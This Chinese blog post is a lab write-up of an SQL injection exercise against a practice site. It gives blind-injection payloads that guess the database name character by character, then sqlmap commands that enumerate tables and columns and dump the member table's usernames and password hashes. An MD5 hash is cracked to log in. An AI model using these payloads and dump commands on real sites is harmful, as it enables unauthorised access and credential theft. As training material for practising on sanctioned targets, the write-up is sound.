testfire.net网站渗透记录
本文最后更新于 62 天前,如有失效请评论区留言。

使用工具:FireFox浏览器、kali

1.打开靶场,寻找注入点。

点击公告/new_list.php?id=1,找到注入点

2.输入id=1’ and 1=1,返回空页面

img

2.入id=1%20 and 1=1,返回正常页面

img

3.判断数据库名字的长度,输入id=1 and length(database())=1,返回空白页,证明不是1,一个一个试确定长度为10

img

4.判断数据库的名字,输入id=1 and substr(database(),1,1)=‘a’ –+,返回空白页,最后第一个确定为s,一次类推,最后确定数据库名字为stormgroup

img

输入

sqlmap -u http://219.153.49.228:44245/new_list.php?id=1 -D stormgroup –tables

有两个表member和notice

目标是member

img

输入

sqlmap -u http://219.153.49.228:44245/new_list.php?id=1 -D stormgroup -T member –columns

得到列名 name, password ,status

img

输入

sqlmap -u http://219.153.49.228:44245/new_list.php?id=1 -D stormgroup -C name,password –dump

获取两个密码

img

6.两个密码都用md5解密,第二个登录成功,获取key

afc53de1254e9f1101d35ffc64617e2d”,解密的结果为“063765”!

img

恭喜你mozhe成功登录用户管理后台,KEY:mozhedca8297ae46cb217555bfb9f146

版权声明:本文为lixiaoming原创,转载请附上出处链接及本声明。
原文链接:https://www.lixiaoming.net/archives/76

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇